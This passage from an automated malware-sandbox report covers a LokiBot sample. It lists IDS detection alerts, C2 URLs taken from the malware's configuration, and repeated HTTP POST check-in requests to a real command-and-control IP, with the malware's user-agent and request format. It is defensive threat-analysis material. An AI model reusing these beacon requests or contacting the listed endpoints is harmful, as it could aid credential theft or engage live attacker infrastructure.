              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49806 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49806 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49776 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49776 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49752 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49744
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49806 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49734 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49733
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49782
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49752
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49776 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49763 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49806 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49734
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49763 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49776
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49758
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49806 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49749
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49759
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49763
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49751 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49751 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49751
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49760
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49756
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.156.177.41 80Jump to behavior
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Malware configuration extractorURLs:
              Source: Joe Sandbox ViewIP Address: 94.156.177.41 94.156.177.41
              Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 149Connection: close
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00934EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00934EB5
              Source: unknownHTTP traffic detected: POST /davinci/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A8F59C4Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
